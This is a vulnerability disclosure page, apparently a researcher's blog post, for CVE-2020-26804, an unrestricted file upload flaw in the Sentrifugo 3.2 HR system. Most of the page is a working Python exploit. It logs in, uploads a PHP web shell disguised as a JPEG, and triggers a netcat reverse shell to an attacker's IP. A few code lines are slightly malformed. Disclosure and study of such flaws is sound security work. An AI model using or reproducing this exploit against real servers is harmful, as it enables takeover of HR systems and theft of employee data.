Skip to main content

Sentrifugo Version 3.2 --> RCE [Authenticated] (announcements) | CVE-2020-26804



Software: https://sourceforge.net/projects/sentrifugo/
Version: 3.2 
Vulnerability: Unrestricted File Upload
CVE: CVE-2020-26804 
Exploit-DB: https://www.exploit-db.com/exploits/48998

Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs...
Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more.
Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you'll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.

Reference:  https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In Sentrifugo web application, users can share an announcement under "Organization -> Announcements" tab. Also, in this page, users can upload attachments with the shared announcements. This "Upload Attachment" functionality is suffered from "Unrestricted File Upload" vulnerability so attacker can upload malicious files using this functionality and control the server.

I wrote an exploit to demonstrate the vulnerability. You need to change hardcoded values before running the exploit.

Exploit:

import requests
from bs4 import BeautifulSoup
from ast import literal_eval

'''
You should change the below hardcoded inputs to get a reverse shell.
'''

login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/announcements/uploadsave"
call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/ca_temp/"
username = "xxx"
password = "xxx"

attacker_ip = "XXX.XXX.XXX.XXX"
listener_port = "4444"

# Set proxy for debugging purposes

proxy = {"http""http://XXX.XXX.XXX.XXX:8080"}

# Log in to the system

session = requests.Session()
request = session.get(login_url)
body = {"username":username,"password":password}
# session.post(login_url, data=body, proxies=proxy) 
session.post(login_url, data=body) # Send a request without proxy
print("Logged in to the application..")

# Upload the PHP shell
files = [
    ('myfile'
        ('shell.php',
        '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port),
        'image/jpeg')
    )
]
# r = session.post(upload_url, files=files, proxies=proxy)
r = session.post(upload_url, files=files) # Send a request without proxy
response = r.content
dict_str = response.decode("UTF-8")
response = literal_eval(dict_str) # Convert bytes to dictionary
filename = response["filedata"]["new_name"]
url = call_shell + filename
print("PHP file is uploaded --> {}".format(url))

# Trigger the shell

session.get(url)

Comments